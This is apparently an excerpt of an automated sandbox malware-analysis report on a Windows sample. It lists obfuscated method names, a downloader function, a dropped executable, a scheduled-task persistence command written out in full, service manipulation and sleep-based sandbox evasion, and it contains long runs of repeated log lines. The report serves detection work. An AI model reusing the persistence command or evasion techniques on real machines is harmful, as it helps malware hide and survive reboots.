                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, L2165oTc18Ys7G5Drv.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Ycj4pFlUjf', 'kVl4rC8RYv', 'OmT4zNBHJB', 'kJjxLayfC2', 'fH1xMsZ7P7', 'NwQx4M2pO9', 'SvhxxSLLrW', 'KLgw8dqXgKKBB7WWYaK'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, S0w2Yird1vtfqLM83v.csHigh entropy of concatenated method names: 'aqnUTY3rHE', 'pd6UOAFZji', 'RaCUwQYjP5', 'syBUlcXCYK', 'PO9UI0gR4d', 'GDPUkSxNSs', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, antjj6P923sx3geJla.csHigh entropy of concatenated method names: 'yipTuGPm4b', 'haYTnQShrV', 'rD0TWxjgc2', 'LpRTPuhJv0', 'G9cTRZdsbx', 'kTfTXKKEHy', 'UuMT883M5T', 'plOTS6TQEH', 'UNiTIJuw3i', 'ScuTUO77fN'
                      Source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, FZaOUuOPvnEAfIAr0M.cs | High entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs | High entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs | High entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_00406EEB ShellExecuteW,URLDownloadToFileW,8_2_00406EEB
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | File created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match - File source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_0040F7E2 Sleep,ExitProcess,8_2_0040F7E2
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Memory allocated: F80000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Memory allocated: 2DD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Memory allocated: 2C70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Memory allocated: 92B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Memory allocated: A2B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Memory allocated: A4C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Memory allocated: B4C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Memory allocated: D00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Memory allocated: 2750000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Memory allocated: D20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Memory allocated: 8720000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Memory allocated: 8280000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Memory allocated: 9720000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Memory allocated: A720000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_0041A7D9
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7101
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 834
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6992
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 388
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Window / User API: threadDelayed 3705
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Window / User API: threadDelayed 5822
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Window / User API: foregroundWindowGot 1710
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - API coverage: 9.4 %
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe TID: 7296 - Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7616 - Thread sleep count: 7101 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620 - Thread sleep count: 834 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756 - Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716 - Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792 - Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732 - Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe TID: 7948 - Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe TID: 8104 - Thread sleep time: -41000s >= -30000s
